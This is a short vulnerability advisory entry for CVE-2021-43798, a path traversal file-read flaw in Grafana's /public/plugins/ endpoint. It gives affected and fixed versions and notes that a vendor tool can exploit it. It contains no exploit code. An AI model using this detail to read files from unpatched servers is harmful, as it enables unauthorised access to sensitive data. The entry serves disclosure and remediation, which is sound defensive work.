Grafana - Arbitrary File Read (CVE-2021-43798)
- Severity
- CVSSv3 Score
- 7.5
- Vulnerability description
Grafana server is affected by an Arbitrary File Read through a Path Traversal vulnerability, located in the /public/plugins/ endpoint. The root cause of this vulnerability consists in improper path normalization. All the versions affected are between 8.0.0-beta1 and 8.3.0.
- Risk description
The risk exists that a remote unauthenticated attacker could exploit this vulnerability to read sensitive information from arbitrary files located on the file system of the server.
- Exploit capabilities
Sniper can read arbitrary files from the target system and extract them as evidence.
- Recommendation
Upgrade the Grafana server to the latest version or to a version higher or equal than 8.3.1, 8.2.7, 8.1.8, and 8.0.7.
- Codename
- Not available
- Detectable with
- Network Scanner
- Exploitable with Sniper
- Yes
- Vuln date
- Nov 2021
- Published at
- Updated at
- Software Type
- Monitoring system
- Vendor
- Grafana
- Product
- Labs